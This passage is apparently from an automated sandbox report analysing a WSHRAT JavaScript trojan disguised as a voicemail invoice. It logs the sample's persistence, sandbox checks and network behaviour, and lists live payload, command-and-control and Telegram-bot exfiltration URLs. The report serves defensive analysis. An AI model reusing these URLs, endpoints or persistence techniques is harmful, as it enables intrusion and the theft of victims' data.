Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false})IHost.CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IServerXMLHTTPRequest2.responseText();IWshShell3.ExpandEnvironmentStrings("%COMPUTERNAME%");IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IHost.CreateOb
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();({ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false})IHost.CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IServerXMLHTTPRequest2.responseText();IWshShell3.ExpandEnvironmentStrings("%COMPUTERNAME%");IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IHost.CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();({ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false})IHost.CreateObject("msxml2.xmlhttp");IServerXMLHTTPRequest2.open("GET", "https://json.geoiplookup.io/", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 ");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IServerXMLHTTPRequest2.responseText();IWshShell3.ExpandEnvironmentStrings("%COMPUTERNAME%");IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IHost.CreateOb

Potential obfuscated javascript found

Source: New Voicemail Invoice 64746w .js

Initial file: High amount of function use 42

Source: New Voicemail Invoice 64746w .js

Array : entropy: 5.34, length: 207, content: 'wfb1Bwm''vfzJCu8''BI9QC29U''mcaOv2LUzg93CW''mZC1mJHUCK9JrxG''sLDkvKm3AgPhqq''n3W0Fdv8mNW4Fa''D2XPs1

Go to definition

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\wscript.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 98575

Jump to behavior

Drops script or batch files to the startup folder

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 98575			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 98575			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 8426

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 7100	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 5304	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1136	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior

Source: wscript.exe, 00000001.00000003.1800959896.0000019395073000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BfaRuhDQEMu4BamlY0oXH
Source: wscript.exe, 00000001.00000003.1871157855.0000019392F5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
Source: wscript.exe, 00000001.00000003.1871157855.0000019392F5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VmciW9EgnD

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 104.20.3.235 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 208.95.112.1 80	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.21.25.148 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.20.4.235 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 40.242.114.161 8426	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.66.44.176 443	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js"

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct

Stealing of Sensitive Information

Yara detected WSHRAT

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2180517172.0000027242C12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255737493.0000027242A3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2256293540.0000027242C1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2180342190.0000027242A3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1797163332.00000193950DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937053189.00000193950D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2938800577.0000019396F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255570115.0000027242752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2251240073.0000027244ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1797358254.00000193952B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937216627.00000193952BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255381138.0000027243CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2936761014.0000019394DFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937959613.0000019396384000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5660, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\98575.js, type: DROPPED

Remote Access Functionality

Yara detected WSHRAT

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2180517172.0000027242C12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255737493.0000027242A3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2256293540.0000027242C1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2180342190.0000027242A3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1797163332.00000193950DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937053189.00000193950D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2938800577.0000019396F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255570115.0000027242752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2251240073.0000027244ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1797358254.00000193952B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937216627.00000193952BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2255381138.0000027243CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2936761014.0000019394DFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2937959613.0000019396384000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5660, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\98575.js, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	63 Scripting	Valid Accounts	11 Windows Management Instrumentation	63 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	Data from Local System	2 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Data Encoding	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 System Information Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	3 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	114 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New Voicemail Invoice 64746w .js	3%	ReversingLabs
New Voicemail Invoice 64746w .js	12%	Virustotal		Browse

Source	Detection	Scanner	Link
json.geoiplookup.io	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
textjdbimanrminiall.pages.dev	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
pastebin.com	0%	Virustotal	Browse
masterokrwh.duckdns.org	18%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://masterokrwh.duckdns.org:8426/is-ready	17%	Virustotal		Browse
https://json.geoiplookup.io/	1%	Virustotal		Browse
https://textjdbimanrminiall.pages.dev/98575.js	100%	Avira URL Cloud	malware
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO	0%	Avira URL Cloud	safe
https://json.geoiplookup.io/	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready	0%	Avira URL Cloud	safe
https://pastebin.com/raw/NsQ5qTHrU#0	0%	Avira URL Cloud	safe
http://ip-api.com/json/%	0%	Avira URL Cloud	safe
http://pastebin.com/raw/NsQ5qTHrL#	0%	Avira URL Cloud	safe
https://pastebin.com/raw/NsQ5qTHr	0%	Avira URL Cloud	safe
http://pastebin.com/raw/NsQ5qTHr	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO	1%	Virustotal		Browse
http://ip-api.com/json/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage	0%	Avira URL Cloud	safe
https://pastebin.com/raw/NsQ5qTHrU#0	1%	Virustotal		Browse
http://pastebin.com/raw/NsQ5qTHrL#	1%	Virustotal		Browse
https://pastebin.com/raw/NsQ5qTHr	1%	Virustotal		Browse
http://ip-api.com/json/%	0%	Virustotal		Browse
http://pastebin.com/raw/NsQ5qTHr	3%	Virustotal		Browse
http://ip-api.com/json/	0%	Virustotal		Browse
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
json.geoiplookup.io	104.21.25.148	true	true	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
textjdbimanrminiall.pages.dev	172.66.44.176	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
pastebin.com	104.20.3.235	true	true	0%, Virustotal, Browse	unknown
masterokrwh.duckdns.org	40.242.114.161	true	true	18%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://masterokrwh.duckdns.org:8426/is-ready	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://json.geoiplookup.io/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://textjdbimanrminiall.pages.dev/98575.js	true	Avira URL Cloud: malware	unknown
https://pastebin.com/raw/NsQ5qTHr	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pastebin.com/raw/NsQ5qTHr	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/NsQ5qTHrU#0	wscript.exe, 00000001.00000003.1871507167.0000019396A09000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO	wscript.exe, 00000001.00000002.2937551105.0000019395838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1870328410.0000019396FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2937551105.0000019395825000.00000004.00000020.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json/%	wscript.exe, 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pastebin.com/raw/NsQ5qTHrL#	wscript.exe, 00000001.00000003.1871507167.0000019396A09000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
104.21.25.148	json.geoiplookup.io	United States	13335	CLOUDFLARENETUS	true
104.20.4.235	unknown	United States	13335	CLOUDFLARENETUS	true
40.242.114.161	masterokrwh.duckdns.org	United States	4249	LILLY-ASUS	true
172.66.44.176	textjdbimanrminiall.pages.dev	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1445449
Start date and time:	2024-05-22 02:45:38 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New Voicemail Invoice 64746w .js
Detection:	MAL
Classification:	mal100.troj.expl.evad.winJS@6/7@7/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:46:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 98575 wscript.exe //B "C:\Users\user\AppData\Local\Temp\98575.js"
01:47:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 98575 wscript.exe //B "C:\Users\user\AppData\Local\Temp\98575.js"
01:47:11	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js
20:46:39	API Interceptor	3x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.3.235	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	2024 12_59_31 a.m..js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
149.154.167.220	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse
	Pg5dhIO92K.exe	Get hash	malicious	AgentTesla	Browse
	Shipping Reference_AWB 703280542_INVOICE_PDF.exe	Get hash	malicious	AgentTesla	Browse
	4289397_SEA SHIPMENT.exe	Get hash	malicious	AgentTesla	Browse
	PAYMENT COPY 02521.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse
	ERsg2wzaD4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Yehir Hastanesi scan00100_PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse
	file.exe	Get hash	malicious	AgentTesla	Browse
	file.exe	Get hash	malicious	AgentTesla	Browse
208.95.112.1	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	ip-api.com/line?fields=query,country
	rswift153826.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	t0LPAdxYUz.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	schtasks.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	oae7jKW2lr.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	9732092 skid fabrication- MTC-NRC-KMC.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	NEW PO (PO01-230227).exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Payment Transfer.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	PO_21052024.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
json.geoiplookup.io	Payment Invoice.js	Get hash	malicious	Unknown	Browse	104.21.25.148
	voicemail Account.js	Get hash	malicious	PureLog Stealer	Browse	172.67.134.82
	Invoices Receivable Documents.js	Get hash	malicious	Unknown	Browse	104.21.25.148
	Accounts Receivable Documents.js	Get hash	malicious	Unknown	Browse	104.21.25.148
	Quarantine_Reports.JS.js	Get hash	malicious	WSHRAT	Browse	172.67.134.82
	Quarantine_Reports.JS.js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	172.67.134.82
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	104.21.25.148
ip-api.com	https://ipfs.chainsafe.io/ipfs/QmYbgiYHMPGkARhXKZcLM2kUkVztAbHXaFtDKG8bnHwJsq	Get hash	malicious	Unknown	Browse	51.77.64.70
	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	208.95.112.1
	rswift153826.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	t0LPAdxYUz.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	schtasks.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	oae7jKW2lr.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	9732092 skid fabrication- MTC-NRC-KMC.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW PO (PO01-230227).exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Payment Transfer.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
pastebin.com	bMAplZixhH.exe	Get hash	malicious	Njrat	Browse	104.20.3.235
	Payment928263456.vbs	Get hash	malicious	GuLoader, XWorm	Browse	104.20.3.235
	Bc8Z5oJ25z.exe	Get hash	malicious	RedLine, Xmrig	Browse	104.20.3.235
	dehdsDiT1p.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	172.67.19.24
	SecuriteInfo.com.Trojan.BtcMine.3634.18624.7601.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	SecuriteInfo.com.Win64.TrojanX-gen.24136.22313.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	SecuriteInfo.com.Win64.TrojanX-gen.24136.22313.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	mSrkZ4yTXx.exe	Get hash	malicious	AsyncRAT	Browse	172.67.19.24
